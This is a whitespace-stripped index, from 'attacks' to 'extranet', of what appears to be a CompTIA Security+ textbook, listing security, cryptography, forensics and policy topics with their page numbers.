cachepoisoning,488–490client-side,493–494DoS(denial-of-service),474–477onencryption,486–487logicbombs,471malwaredefenses,473–474malware(maliciouscode),466man-in-the-middle,483–484minimizingavenuesof,12–13nullsessions(WindowsOSs)and,478overviewof,464pass-the-hash,492passwordguessing,490–492phishingandpharming,485–486polymorphicmalware,469ransomware,473RATs(remoteaccesstrojans),496remediationactions,684replay,484reviewandQ&A,500–503rootkits,470–471scanning,486sniffing,479socialengineering,478softwareexploitation,492–493spam,484spim,485spoofing,480–482spyware,471SSL/TLS,534TCP/IPhijacking,483
toolsusedin,496–497transitiveaccessand,484Trojanhorses,470typesof,652–654viruses,466–468war-dialingandwar-driving,477–478worms,469
attribute-basedaccesscontrol(ABAC),303–304AttributeCertificates(ACs),169–170auditing
configurationstatusauditing,640overviewof,497–498performingroutinely,498–499securitylogsand,391usersandgroups,290
auditing,basicsecuritygoals,20AUP(acceptableusepolicy)
BYODconcerns,369humanresourcespolicies,49–50
authenticationinAAAprocess,305accesscontrolcomparedwith,311accountandpasswordexpirationand,297basicauthentication,307biometricsand,62–63captiveportalshandlingonwirelessnetworks,362CompTIASecurity+ExamObjectives,752–753digestauthentication,307–308domainpasswordpolicy,293–294grouplevel,291–292GroupPolicy,32–33
IPsec(IPSecurity),182–183Kerberos,308–309managingaccessbyroles,292mechanismsandpolicies,32mobileapplicationsecurity,371–372multifactorauthentication,214–215,307–308mutualauthentication,307–308overviewof,289passwordpolicies,33,292–293privilegemanagement,288–289remoteaccessand,306–307reviewandQ&A,331–335assecuritygoals,20inSSL/TLS,533SSO(singlesign-on),294–295TACAS+(TerminalAccessControllerAccessControlSystem+),315–316
timeofdayrestrictions,295–296tokenusein,296–297,307–308userlevel,289–291usesofcryptography,116–117inWPA,354X.500standardand,172
AuthenticationHeader(AH)inIPsec,182–183fortrafficsecurity,327–329
authenticationprotocolsCHAP(Challenge-HandshakeAuthenticationProtocol),320EAP(ExtensibleAuthenticationProtocol),319–320L2TP(Layer2TunnelingProtocol),320–321NTLM(NTLANManager),320
overviewof,317PAP(PasswordAuthenticationProtocol),320PPP(Point-to-PointProtocol),317–318PPTP(Point-to-PointTunnelingProtocol),318–319SSH(SecureShell),321–322Telnet,321tunnelingprotocols,317–318
Authenticode,codesecurityand,545–546authorityrevocationlist(ARL),142authorization
inAAAprocess,305RADIUS(RemoteAuthenticationDial-InUserService),314remoteaccessand,310–311TACAS+(TerminalAccessControllerAccessControlSystem+),316–317
AutomaticUpdates,Windows7,424–426autoplay,201–202AV(antivirus)products.Seeantivirus(AV)productsavailability
inCIA,20hostsand,254–255importanceof,253measuringinriskcalculation,625
Bback-outplans
inchangemanagement,642indisasterrecovery,601
backdoorsinoldschoolattacks,652
overviewof,472–473unauthorizedaccessvia,82
BackTrack,toolsetsrelatedtoattacks,496backuppowersources,209backups
alternativesites,596–597back-outplan,642databackups,45frequencyandretention,594–596overviewof,591–592storage,596strategies,592–594
bandwidth,demandfordataservicesand,339bankingrulesandregulations(U.S.),724–725bannergrabbing,403–404BaselCommittee,onrisks,614baselines
applicationconfiguration,579configurationbaseline,444configurationidentificationand,639defined,409hostsoftware,437,448–449identifyingandanalyzinginriskmanagement,626systemhardening,409UNIX,417–419
basicinput/outputsystem(BIOS),physicalsecurityand,200–201batchmode,HIDSsoperatingin,388BC(businesscontinuity)
BCP(businesscontinuityplan),585BIA(businessimpactanalysis),586continuityofoperations,587
disasterrecovery.Seedisasterrecoveryidentifyingcriticalsystems,586overviewof,584–585removingsinglepointsoffailure,586reviewandQ&A,604–607riskassessment,586successionplanning,586–587
BCP(businesscontinuityplan),585Bcrypt,keystretching,120beaconframes,inIEEE802.11,349Bell-LaPadulamodel,forconfidentiality,34–35bestevidencerule,677bestpractices
incidentresponse,664,667–668riskmanagement,627–629securitycompliance,56
BIA(businessimpactanalysis),586,588–589Biba,Kenneth,35Bibamodel,forintegrity,36BigData,computerforensicsand,690biometrics,physicalaccesscontrols,62–63,211–213BIOS(basicinput/outputsystem),physicalsecurityand,200–201birthdayattacks,492BitLocker
filesystemencryption,123hardeningWindowsOSs,413–415
black-boxtesting,insoftwaredevelopment,567black-hathacking,497blacklisting
antispamproducts,430filtering/blacklistingspamsenders,515
hosthardening,434blindFTP(anonymousFTP),540blockciphers
AES(AdvancedEncryptionStandard),105BlowfishandTwofish,107CAST(CarlisleAdamsandStaffordTavares),105–106DES(DataEncryptionStandard),104IDEA(InternationalDataEncryptionAlgorithm),107–108RC2,RC5,andRC6,106vs.streamciphers,108
Blowfish,107,322blu-raydiscs,280Bluebuggingattacks,346Bluejackingattacks,345Bluesnarfingattacks,346Bluetooth
attacks,345–346hardeningmobiledevices,455–456introductiontowirelessnetworks,337overviewof,343–345securityissues,65versions,345
BluetoothDOSattacks,346body,ine-mailstructure,506–508bollards,inphysicalsecurity,195bootloaders,virtualizationcomparedwith,254bootsectorviruses,467bootdiskattacks,192–194botnets
overviewof,471–472researchingspamincidence,514
BPAs(businesspartnershipagreements),59brandjacking,client-sideattacks,494Brewer-Nashconfidentialitymodel,35bridgeCAs,hybridtrustmodeland,160bridges,257–258BringYourOwnDevice(BYOD)
concerns,366–370humanresourcespolicies,52
browserscertificateuseby,535HTTPandHTTPSfordatatransfer,537–539Javaand,543malware,551plug-ins,550–551securing,546SSL/TLSsetupoptions,532
brute-forceattackspasswordguessing,491–492passwordstrengthand,294
buffer-overflowattacksoverviewof,575–576softwareexploits,493stringhandlingand,569onwebcomponents,542
bugschangemanagementand,636trackinginsoftwaredevelopment,571–572
BurpSuite,497bustopology,networktopologies,222businesscontinuity.SeeBC(businesscontinuity)businesscontinuityplan(BCP),585
businessimpactanalysis(BIA),586,588–589businesspartners,on-boarding/off-boarding,49businesspartnershipagreements(BPAs),59businessprocesses,riskmanagementand,612businessrisks,613BYOD(BringYourOwnDevice)
concerns,366–370humanresourcespolicies,52
CCAcertificates,136–137cablemodems,265–266cable,wirespeed,395cachepoisoning,488–490cachingproxy,270CACs(CommonAccessCards),typesoftokens,296CaliforniaSenateBill1386(SB1386),724cameras,inaccesscontrol.SeeCCTV(closedcircuitTV)campusareanetworks(CANs),networkarchitectures,221campusnetworks.Seealsointranet,242CAN-SPAM(ControllingtheAssaultofNon-SolicitedPornographyandMarketingAct),514,701–702
Canadianprivacylaws,729canonicalizationerrors,569–570CANs(campusareanetworks),networkarchitectures,221CapabilityMaturityModelIntegration(CMMI),644–645captiveportals,handlingauthenticationonwirelessnetworks,362CarlisleAdamsandStaffordTavares.SeeCAST(CarlisleAdamsandStaffordTavares)
CAs(certificateauthorities)certificaterevocation,139–141
certificateverificationandtrust,143–146choosingbetweenpublicandin-houseCAs,152–153CPS(certificationpracticesstatement),131hierarchicaltrustmodeland,157inhouseCAs,152–153outsourcedCAs,153–154overviewof,130–131peer-to-peertrustmodel,158–159PKIXstandardand,168publicCAs,151–152responsibilitiesof,169rootCAs,157servicesprovidedby,129trusting,131typingdifferencePKIstogether,154–155
case(common)law,698–699CAST(CarlisleAdamsandStaffordTavares)
algorithmsusedinPGP,181overviewof,105–106SSHand,322
Category3(Cat3),twistedpaircable,275Category5(Cat5),twistedpaircable,275Category6(Cat6),twistedpaircable,275causeandeffectanalysis,inriskmanagement,626CC(CommonCriteriaforInformationTechnologySecurity)
overviewof,184TrustedOSs,434–435
CCB(changecontrolboard),642–643CCMP(CounterModewithCipherBlockChaining-MessageAuthenticationCodesProtocol)
currentsecuritymethods,359
inWPA2,355CCTV(closedcircuitTV)
foraccesscontrol,198–199physicalaccesscontrols,196unlicensedbandsand,349
CDIs(constraineddataitems),inClark-Wilsonsecuritymodel,37CDs(compactdisks)
autoplay,201bootdiskattacks,192–194CD-R(compactdisc-recordable),279–280CD-RW(compactdisc-rewriteable),280
cells,ATM,225cellularphones.SeemobiledevicescentralizedPKIinfrastructures,146–147CEP(CertificateEnrollmentProtocol),incertificatemanagement,168,183
CER(crossovererrorrate),213–214CERT(ComputerEmergencyResponseTeam),651–652certificateauthorities.SeeCAs(certificateauthorities)certificate-basedthreats,160–161CertificateEnrollmentProtocol(CEP),incertificatemanagement,168,183
certificateextensions,135–136CertificateManagementProtocol(CMP),176certificatepath,157–158certificatepolicy(CP),152certificaterepositories,143,170certificaterevocationlists.SeeCRLs(certificaterevocationlists)certificateservers,131certificatesigningrequest(CSR),138certificateverification,143–146
certificates.Seedigitalcertificatescertificationpracticesstatements(CPSs)
areasaddressedbyPKIXmodel,169CAsand,131
CFAA(ComputerFraudandAbuseAct)overviewof,701–702privacyobjectivesof,721–722statutorylawscontrollingcomputercrime,699
CGI(CommonGatewayInterface),546chainofcustody,evidence,684Challenge-HandshakeAuthenticationProtocol(CHAP)
authenticationmechanismsinPPP,318overviewof,320
challenge/responsesystem,inblockingspam,516changecontrolboard(CCB),642–643changemanagement
back-outplan,642CCB(changecontrolboard),642–643changemanagementpolicy,44–45CMMI(CapabilityMaturityModelIntegration),644–645codeintegrityand,643–644defined,635implementing,640–642needfor,635–637overviewof,634–635phasesofconfigurationmanagement,639–640reviewandQ&A,646–649riskmitigationand,614–615scopeof,636separationofdutiesand,637–638
changes,typesof,637
CHAP(Challenge-HandshakeAuthenticationProtocol)authenticationmechanismsinPPP,318overviewof,320
chatprograms.SeeIM(instantmessaging)checksums,analysisofdatastreamforchanges,685Children’sOnlinePrivacyProtectionAct(COPPA),722China
APTattackonU.S.firms,5nation-statehacking,7OperationNightDragonattackoriginatingfrom,7powergridattacksand,4spyingby,5
choice,responsiblecollectionofPII,719chosen-plaintextattack,340Christmasattack,486CIA(confidentiality,integrity,andavailability)
cryptographyand,116–117overviewof,20
ciphersuitesTLSCipherSuiteRegistry,174usesofcryptography,117
ciphers.Seealsoalgorithmsincontemporaryencryption,96–97defined,90strongvs.weak,117
ciphertextattacksonencryption,486encryptingplaintextinto,90historicalperspectivesoncryptography,94
CIRT(ComputerIncidentResponseTeam),651–652Citibankattack(June-October1994),2
Clark-Wilsonintegritymodel,36–37Class1certificates,132Class2certificates,132Class3certificates,132ClassAaddresses,237ClassBaddresses,237ClassCaddresses,237classification
inBell-LaPadulasecuritymodel,34–35hardeningWindowsServer2012,415ofinformationindatapolicy,45–46U.S.governmentsecuritylabels,302
clean-agentfiresuppressionsystems,206cleandeskpolicies,52,83clickfraud,697client/serverarchitecture
client-sideattacks,493–494,554,577networkingand,222RADIUS,312server-sidescripts,547server-sidevs.client-sidevalidation,579–580
closedcircuitTV.SeeCCTV(closedcircuitTV)cloudcomputing
computerforensicsand,690disasterrecoveryand,599overviewof,283–284risksassociatedwith,629storingdata,440
clusters/clusteringfaulttolerancefrom,600–601freespace,slackspace,andallocatedspace,686
CMMI(CapabilityMaturityModelIntegration),644–645CMP(CertificateManagementProtocol),176CMS(CryptographicMessageSyntax)
S/MIMEand,179triple-encapsulatedmessages,180
coaxialcable,274CobaltStriketoolset,497code
arbitrary/remotecodeexecution,578codesigning,546,551–552codingphaseofsoftwaredevelopment,562–566injectionattacks.Seeinjectionattacksintegrity,643–644malicious.Seemalware(maliciouscode)reducingvulnerabilitiesin,563securecodingconcepts,568webcomponentsvulnerabilities,541–542
codeofethics,humanresourcepolicies,47–48CodeRedworm
buffer-overflowattacks,575historicalsecurityincidents,3
COFEE(ComputerOnlineForensicsEvidenceExtractor),679coldsites,alternativebackupsites,597collaborativedevelopment,changemanagementand,636collisionattacks,compromisinghashalgorithms,99collisiondomains,hubsandswitchesand,257commandinjectionattacks,575CommonAccessCards(CACs),typesoftokens,296common(case)law,698–699CommonCriteriaforInformationTechnologySecurity(CC)
overviewof,184
TrustedOSs,434–435CommonGatewayInterface(CGI),546CommonVulnerabilitiesandExposures.SeeCVE(CommonVulnerabilitiesandExposures)
CommonWeaknessEnumeration.SeeCWE(CommonWeaknessEnumeration)
communicationssecurity(COMSEC),19communityclouds,284compactdisks.SeeCDs(compactdisks)competentevidence,677completemediation,SaltzerandSchroeder’seightprinciplesofsecuritydesign,27
complianceCompTIASecurity+ExamObjectives,741–745withlaws,bestpracticesandstandards,56trainingand,58websecuritygatewaysproviding,271
CompTIASecurity+ExamObjectivesaccesscontrolandidentitymanagement,752–753application,data,andhostsecurity,749–752complianceandoperationalsecurity,741–745cryptography,753–755networksecurity,738–740threatsandvulnerabilities,745–749
ComputerEmergencyResponseTeam(CERT),651–652computerforensics
acquiringevidence,679–681analysisphase,684BYODconcerns,367–368chainofcustody,684conductinginvestigations,682–683
deviceforensics,688e-discovery,689–690ensuringdataisnotmodified,685filesystems,685–687hostforensics,685identifyingevidence,681metadataand,687–688networkforensics,689overviewof,674–675processof,677–679protectingevidence,681reviewandQ&A,691–695rulesregardingevidence,677standardsforevidence,676–677storingevidence,682transportingevidence,682typesofevidence,675–676
ComputerFraudandAbuseAct.SeeCFAA(ComputerFraudandAbuseAct)
ComputerIncidentResponseTeam(CIRT),651–652computermischief,699ComputerOnlineForensicsEvidenceExtractor(COFEE),679computersecurity,introduction
approachestosecuringsystems,13criminalorganizations,10currentthreats,4–7defined,1ethics,14historicalincidents,1–4insiders,9–10intruders,9
minimizingavenuesofattack,12–13nation-states,terrorists,andinformationwarfare,10–11referencematerials,14reviewandQ&A,15–17specificandopportunistictargets,12trends,11–12virusesandworms,8
computersoftwareconfigurationitems,639computertrespass,699COMSEC(communicationssecurity),19concentrators
intrafficmanagement,264VPNconcentrator,266–267
Conficker,4confidentialinformation,46confidentiality
inCIA,20,116–117IPsecand,182–183usesofcryptography,116WEPand,350WTLSand,340
confidentialitymodelsBell-LaPadulamodel,34–35Brewer-Nashmodel,35overviewof,34
configurationbaseline,applicationhardening,444,579configurationcontrol,614–615,640configurationidentification,639configurationitems,639configurationmanagement.Seealsochangemanagement
defined,635
hostsecurity,23phasesof,639–640
configurationstatusaccounting,640configurationstatusauditing,640confusion,secrecyprinciples,120connection-orientedprotocols,228connectionlessprotocols,228connections,forremoteaccessandauthenticationprotocols,330consent,inresponsiblecollectionofPII,719constraineddataitems(CDIs),inClark-Wilsonsecuritymodel,37contactlessaccesscards,197containment,isolatingincidents,661content
antispamfilters,430content-basedsignatures,381content-filteringproxy,270internetcontentfilters,272protectingwithIPsec,324UTMappliancesforinspecting,273websecuritygatewaysmonitoring,271
ContentScrambleSystem(CSS),digitalrightsmanagement,121–122context
context-basedsignaturesinIDSs,381protectingwithIPsec,325
contingencyplanning,589continuousriskmanagement,611–612ControllingtheAssaultofNon-SolicitedPornographyandMarketingAct(CAN-SPAM),514,701–702
controls(countermeasuresorsafeguards)defined,610designingandevaluating,617
ConventiononCybercrime,699–700convergence,200cookiecutterprograms,privacyenhancingtechnologies,730cookies
disabling,550name-valuepairsfordefinedpurposes,547–548usesof,548–550
COPPA(Children’sOnlinePrivacyProtectionAct),722copyrights,digitalrightsmanagement,708–710CoreImpacttoolset,497corporatenetworks.Seealsointranet,242corporatepolicies,BYODconcerns,368–369correctnessofsystem,approachestosecurity,13cost/benefitanalysis,inriskmanagement,626cost-effectivenessmodeling,inriskmanagement,626–627CounterModewithCipherBlockChaining-MessageAuthenticationCodesProtocol(CCMP)
currentsecuritymethods,359inWPA2,355
countermeasures(safeguardsorcontrols)defined,610designingandevaluating,617
CP(certificatepolicy),152CPSs(certificationpracticesstatements)
areasaddressedbyPKIXmodel,169CAsand,131
CRC(cyclicalredundancycheck),analysisofdatastreamforchanges,685credentialmanagement,mobileapplications,371creditcardregulation,703–704criminalorganizations,typesofthreats,10criticalflags,certificateextensionsand,136
criticalinfrastructuresFrameworkforImprovingCriticalInfrastructureCybersecurity,21–22
threatsto,11CRLs(certificaterevocationlists)
certificaterevocation,139–142certificatesuspension,139checkingtoseeifcertificateshavebeenrevoked,145–146distributionofCRLfiles,141–142PKIXstandardand,168–169
CRLSign,X.509digitalcertificateextensions,135cross-certificationcertificates
peer-to-peertrustmodel,158typesofcertificates,137
cross-siterequestforgery(XSRF)inputvalidationand,569overviewof,576–577
cross-sitescriptingattacks,client-side,554cross-sitescripting(XSS)attacks
inputvalidationand,569overviewof,572–573
crossovererrorrate(CER),213–214cryptanalysis
attacksonencryption,486defined,90quantumcryptanalysis,114
CryptographicMessageSyntax(CMS)S/MIMEand,179triple-encapsulatedmessages,180
cryptographyAES(AdvancedEncryptionStandard),105
algorithms,96–97asymmetricencryption,109–110,113blockciphersvs.streamciphers,108Blowfish,107CAST(CarlisleAdamsandStaffordTavares),105–106ciphersuites,117comparativestrengthandperformanceofalgorithms,93CompTIASecurity+ExamObjectives,753–755cryptographicapplications,122–123cryptographicerrorsandfailure,565databaseencryption,123defined,90DES(DataEncryptionStandard),103–105DH(DIffie-Hellman),109–110digitalsignatures,120–121DRM(digitalrightsmanagement),121–122ECC(Ellipticcurvecryptography),112–113ElGamal,111–112ephemeralkeys,118fundamentalmethodsin,92–93hashingfunctions,99–100,102–103historicalperspectiveson,93–94IDEA(InternationalDataEncryptionAlgorithm),107–108import/exportrestrictionson,705–706keyexchange,117–118keymanagement,98keystretching,118–119MD(MessageDigest),101–102nonrepudiationand,117one-timepads,96overviewof,90–92
proventechnologiesfor,123quantumcryptography,113–114randomnumbersand,98,566RC(RivestCipher),106–107reviewandQ&A,124–127RIPEMD(RACEIntegrityPrimitivesEvaluationMessageDigest),101
RSA(Rivest,Shamir,andAdleman),110–111secrecyprinciples,120sessionkeys,118SHA(SecureHashAlgorithm),100–101steganography,114–115substitutionciphers,94–96symmetricencryption,103,108symmetricvs.asymmetric,113transportencryption,120Twofish,107useinCIA,116–117
CSR(certificatesigningrequest),138CSS(ContentScrambleSystem),digitalrightsmanagement,121–122culture,ofriskmanagement,612CVE(CommonVulnerabilitiesandExposures)
application-levelattacks,572MITREsecuritymanagementenumerationsandstandards,578reducingcodevulnerabilities,563
CWE(CommonWeaknessEnumeration)CWE/SANSTop25MostDangerousSoftwareErrors,563–564MITREsecuritymanagementenumerationsandstandards,578reducingcodevulnerabilities,563
cyberkillchain,inincidentresponse,669CyberObservableeXpression(CybOX)
makingsecuritymeasurable,669–670standardsassociatedwithIOCs,669
cybercrimecomputertrespass,699ConventiononCybercrime,699–700currentthreatenvironment,4–5listofcommoncrimeschemes,698overviewof,697–698privacyand,701
cybersecurity,19CybersecurityFrameworkModel,21–22Cyberwar,3CybOX(CyberObservableeXpression)
makingsecuritymeasurable,669–670standardsassociatedwithIOCs,669
cyclicalredundancycheck(CRC),analysisofdatastreamforchanges,685
DDAC(discretionaryaccesscontrol),302DAP(DirectoryAccessProtocol),539DAT(digitalaudiotape),279data
analysisofdatastreams,687CompTIASecurity+ExamObjectives,749–752encryption,438–439ensuringforensicdataisnotmodified,685handlingBigData,440highavailabilityandfaulttolerance,599–600labeling,handling,disposingof,46managingstorageacrossnetwork,255–256
minimizationasmitigationstrategies,658mitigationstrategiesfortheftorloss,615ownership,45,366–367policies,45–47poorsecuritypractices,82securing,439–440storing,440–441unauthorizedsharing,45volatilityof,679websecuritygatewaysprotecting,271
dataatrest,datasecurity,440DataBreachInvestigationsReport(DBIR),Verizon,12databreaches
currentthreatenvironment,6–7privacy,733
DataEncryptionStandard.SeeDES(DataEncryptionStandard)dataintransit,datasecurity,440datainuse,datasecurity,440datalinklayer(Layer2),OSI
bridgesandswitchesoperatingat,257–258EthernetandLayer2addresses,233
datalossprevention(DLP)overviewof,304protectingdatatransfer,272
DataOverCableServiceInterfaceSpecification(DOCSIS),265DataProtectionDirective(EU),721–722dataprotection,Europeanstatutes,728databases
encrypting,123,439NoSQLdatabasevs.SQLdatabase,579
DataEncipherment,X.509digitalcertificateextensions,135
datagramsdefined,225encrypting,327–329IPpackets,226–227
DBIR(DataBreachInvestigationsReport),Verizon,12DCS(distributedcontrolsystems),hardeningSCADAsystems,454DDoS(distributeddenial-of-service)attacks,476–477decentralizedPKIinfrastructures,146–147decisionmaking,riskmanagementas,608decisiontrees,IDSanalysisengineusing,390defaultdeny,fail-safedefaults,25–26defenseindepth
inalternativeenvironments,459overviewof,29–31securityperimeterand,60
degaussingmedia,47deltabackups,592–594demilitarizedzone(DMZ)
diversityofdefense,31overviewof,240–241
demonstrativeevidence,676denial-of-service.SeeDoS(denial-of-service)attacksDepartmentofDefense(DoD),TEMPESTprogram,66–67DepartmentofJustice(DOJ),incidentresponsebestpractices,667–668deprecatedfunctions,566DES(DataEncryptionStandard)
S/MIMEand,178supportedbyWTLS,340symmetricencryptionalgorithm,103–104
designphase,softwaredevelopment,562detection
ofincidents,659–660inoperationalmodelofcomputersecurity,20
developmentlifecycle,softwaredevelopment,560devices
configuringinnetworkhardening,442–443forensics,688GroupPolicyblockingaccessto,451–452infrastructuresecurity,253inlinenetworkdevices,395mobiledevices.Seemobiledevicesnetworksegmentationlimitingcommunicationbetween,457–458removingtoisolateincidents,661–662theft,203–204wirelessdevices,264–265
DH(DIffie-Hellman)IPsecusing,327keyexchange,118overviewof,109–110PGPusing,181S/MIMEv3support,179SSL/TLSusing,533
DHCP(DynamicHostConfigurationProtocol)managingaddressspacewith,266overviewof,238
diagnostics,network,268–269Diameter,314dictionaryattacks,491differentialbackups,592–593differentialcryptanalysis,91DIffie-Hellman.SeeDH(DIffie-Hellman)Diffie,Whitfield,109–110
diffusion,secrecyprinciples,120digitalaudiotape(DAT),279digitalcertificates
inasymmetricencryption,109attributes,135–137CAs(certificateauthorities)and,130–131certificate-basedthreats,160–161certificaterepositories,143classesof,132defined,128,130forestablishingauthenticity,308–309extensions,135–136IPsecusing,327keydestruction,142lifecycle,137overviewof,134–135RAs(registrationauthorities)and,131–132registrationandgeneration,137–138renewal,138–139revocation,139–142stolen,161suspension,139trustandcertificateverification,143–146whattheyare,172
digitalforensics.Seealsocomputerforensics,676digitallineartape(DLT),279DigitalMillenniumCopyrightAct(DMCA),709digitalrightsmanagement(DRM),121–122,708–710digitalsandbox,396DigitalSignatureStandard(DSS),100digitalsignatures
inasymmetricencryption,109–110Canadianlaws,708codesigning,551–552ELGamalusedfor,111Europeanlaws,708overviewof,120–121RSAprotocolusedfor,111servicesprovidedbyS/MIME,179U.N.laws,707–708U.S.laws,707X.509digitalcertificateextensions,135
digitalvideodiscs.SeeDVDs(digitalvideodiscs)directevidence,676direct-sequencespreadspectrum(DSSS),348DirectoryAccessProtocol(DAP),539directoryservices,539–540directorytraversalattacks,575disasterrecovery
alternativebackupsites,596–597backoutplanning,601backupfrequencyandretention,594–596backupstorage,596backupstrategies,592–594backupsand,591–592categoriesofbusinessfunctions,588–589cloudcomputingand,599failureandrecoverytiming,600–601highavailabilityandfaulttolerance,599–600ITcontingencyplanning,589overviewof,587plans,587–588
RAID(RedundantArrayofIndependentDisks),601–602recoverytimeobjectivesandrecoverypointobjectives,591redundancyofspareparts,602–603securerecovery,598–599tabletopexercises,590tests,exercises,andrehearsals,589–590utilityandpowerinterruptions,597–598
disasterrecoveryplan.SeeDRP(disasterrecoveryplan)Discovery,377diskwipeutilities,forcomputerforensics,682disposalanddestructionpolicies,dumpsterdivingand,46–47distinguishednames,X.500standard,144distributedcontrolsystems(DCS),hardeningSCADAsystems,454distributeddenial-of-service(DDoS)attacks,476–477diversityofdefense,31DKIM(DomainKeysIdentifiedMail),517DLP(datalossprevention)
overviewof,304protectingdatatransfer,272
DLT(digitallineartape),279DMCA(DigitalMillenniumCopyrightAct),709DMZ(demilitarizedzone)
diversityofdefense,31overviewof,240–241
DNScachepoisoning,235DNS(DomainNameSystem)
howitworks,236remotepacketdelivery,235
DNSkiting,488DNSpoisoning
attacksonaddresssystem(IPaddresses),488
pharmingattacksand,76DNSspoofingattacks,489DNSBL(DNSblacklisting),515DNSSEC
hardeningWindowsServer2012,415remotepacketdelivery,235
DOCSIS(DataOverCableServiceInterfaceSpecification),265documentaryevidence,676DoD(DepartmentofDefense),TEMPESTprogram,66–67DOJ(DepartmentofJustice),incidentresponsebestpractices,667–668domaincontrollers
hardeningWindowsServer2008,414passwordpolicy,293
DomainNameSystem.SeeDNS(DomainNameSystem)domainpasswordpolicy,293–294DomainKeysIdentifiedMail(DKIM),517domains,settingpasswordsfor,294doors
mantraps,198inphysicalsecurity,195
DoS(denial-of-service)attacksCyberwar,3defendingagainst,476–477distributed,476ICMPexecuting,229,231overviewof,474–475performingwithphysicalaccess,194smurfattacks,476typesofoldschoolattacks,652
drive-bydownloadattacks,494driveimaging,194,683
DRM(digitalrightsmanagement),121–122,708–710DRP(disasterrecoveryplan)
categoriesofbusinessfunctions,588–589comparedwithbusinesscontinuityplan,589overviewof,587–588tests,exercises,andrehearsals,589–590
DSLmodems,265–266DSS(DigitalSignatureStandard),100DSSS(direct-sequencespreadspectrum),348dualcontrol,ofcryptographickeys,150duecare,indefiningreasonablebehavior,53duediligence,indefiningreasonablebehavior,53dueprocess,inguaranteeingindividualrights,54dumpsterdiving
disposalanddestructionpoliciesand,46–47poorsecuritypractices,80–81
duplication,investigationofincidents,665Duqu,5–6DVDs(digitalvideodiscs)
autoplay,201bootdiskattacks,192–194typesofopticalmedia,279–280
DynamicHostConfigurationProtocol(DHCP)managingaddressspacewith,266overviewof,238
dynamicNAT,239
Ee-discovery(electronicdiscovery),computerforensics,689–690e-mail
DKIMdetectingspoofing,517encrypting,517–518firewallsand,505headerandbodyinstructureof,506–508hoaxes,513–514howitworks,505–506hygiene,512maliciouscodeand,510–513MIMEprotocolin,508–509PGP,520–521phishingattacksvia,75reviewandQ&A,526–529S/MIME,179,518–520scanningforviruses,429securityof,509–510SIDFblockingspam,516–517spam,514–516spoofingattacks,480
e-mailusagepolicy,humanresourcespolicies,51EAP(ExtensibleAuthenticationProtocol)
authenticationmechanismsinPPP,318currentsecuritymethods,357overviewof,319–320
EAP-MD5,357–358EAP-TLS,312,357–358EAP-TTLS,357–358EAPOL(ExtensibleAuthenticationProtocoloverLAN),311–312EarlyLaunchAnti-Malware(ELAM),hardeningWindowsServer2012,415
eavesdroppingattacksonSSL/TLS,534
recentadvancesin,67vanEckphenomenon,66–67
ECC(Ellipticcurvecryptography),112–113ECDH(EllipticCurveDiffie-Hellman),110,113ECDHE(EllipticCurveDiffie-HellmanEphemeral),110,119economyofmechanism,SaltzerandSchroeder’seightprinciplesofsecuritydesign,26–27
ECPA(ElectronicCommunicationsPrivacyAct),700–701,702EDH(EphemeralDiffie-Hellman),110,119EDR(enhanceddatarate),344EDRM(ElectronicDiscoveryReferenceModel),689–690EFS(EncryptingFileSystem),123egressfiltering,antispamproducts,431ELAM(EarlyLaunchAnti-Malware),hardeningWindowsServer2012,415
elasticity,hostsand,254–255ElectricPowerGrid,historicalsecurityincidents,4electromagneticeavesdropping,66–67electromagneticinterference(EMI),209–210electronicaccesscontrolsystems
accesstokens,210–211biometrics,211–214doorwaysand,197–198multiple-factorauthentication,214–215smartcards,211
ElectronicCommunicationsPrivacyAct(ECPA),700–701,702ElectronicDiscoveryReferenceModel(EDRM),689–690electronickeyexchange,inRSAprotocol,111electronicmedia,280–281ElectronicPrivacyInformationCenter(EPIC),720ElGamal,111–112
elitehackers,9Ellipticcurvecryptography(ECC),112–113EllipticCurveDiffie-Hellman(ECDH),110,113EllipticCurveDiffie-HellmanEphemeral(ECDHE),110,119embeddedsystems,hardening,455emergencypoweroff(EPO)switches,209EMI(electromagneticinterference),209–210employeehiringandpromotions,humanresourcespolicies,48–49employees
eliminatingaccountsofformer,48mandatoryvacations,49retirement,separation,ortermination,49successionplanning,586–587
EncapsulatingSecurityPayload(ESP)encryptingdataportionofdatagram,327–329IPsec,182–183
enclaves,243–244EncryptingFileSystem(EFS),123encryption
algorithms.Seealgorithmsattackson,486–487cryptographycomparedwith,91dataencryption,438–439exampleofsecuritymethodsworkingagainsteachother,31hardwaredevicesin,437–438howPGPworks,180–181IMprogramslackingsupportfor,523–524import/exportrestrictionson,705–706man-in-the-middleattacksonencryptedtraffic,483–484mobileapplicationsecurity,371–372mobiledevicesecurity,363
PKIand,129privacyand,729S/MIMEservices,178SSLandTLSprotocols,531–536steganographycomparedwith,114–115
encryption,ofe-mailoverviewof,517–518PGP,520–521S/MIME,518–520
end-entitycertificatesPKIXstandardand,168typesofcertificates,136
endpoints,tunnelingprotocols,318enhanceddatarate(EDR),344enhancedsecurityservices(ESS),forS/MIME,179Enigmamachine,94enterprisemanagement,integratedintohost-basedIPS,394entropy,randomnessand,98enumerationattacks,652environmentalcontrols,204environmentalissues
firesuppression,64HVAC(heating,ventilation,andairconditioning),63–64UPS(uninterruptiblepowersupply),64
EphemeralDiffie-Hellman(EDH),110,119ephemeralkeys,118EPIC(ElectronicPrivacyInformationCenter),720EPO(emergencypoweroff)switches,209eradication,isolatingincidents,661errors/exceptionhandling
bugtracking,571–572
cryptographicerrorsandfailure,565exceptionmanagement,22–23language-specificfailures,566softwaredevelopment,568
escalation,incidentresponse,663ESP(EncapsulatingSecurityPayload)
encryptingdataportionofdatagram,327–329IPsec,182–183
ESS(enhancedsecurityservices),forS/MIME,179Ethernet
networkprotocol,224packetdeliveryand,233UTP/STPcable,274–275
ethics,14,710–712Europeanprivacylaws,728–729EVDO(EvolutionDataOptimized)
3Gmobilenetworks,342demandfordataservicesand,339
eventlogs,securitytemplates,453evidence
acquiring,679–681analysisof,684chainofcustody,684identifying,681protecting,681rulesregarding,677standardsfor,676–677storing,682transporting,682typesof,675–676
eviltwinattacks,352
EvolutionDataOptimized(EVDO)3Gmobilenetworks,342demandfordataservicesand,339
evolutionarymodel,softwaredevelopmentprocessmodels,559exceptions.Seeerrors/exceptionhandlingexclusionaryrule,ofevidence,677eXclusiveOR(XOR),useincryptography,97exercises,disasterrecovery,589–590expiration,accountandpassword,297,304exposurefactor,611eXtensibleAccessControlMarkupLanguage(XACML),304ExtensibleAuthenticationProtocol.SeeEAP(ExtensibleAuthenticationProtocol)
extranet,242–243
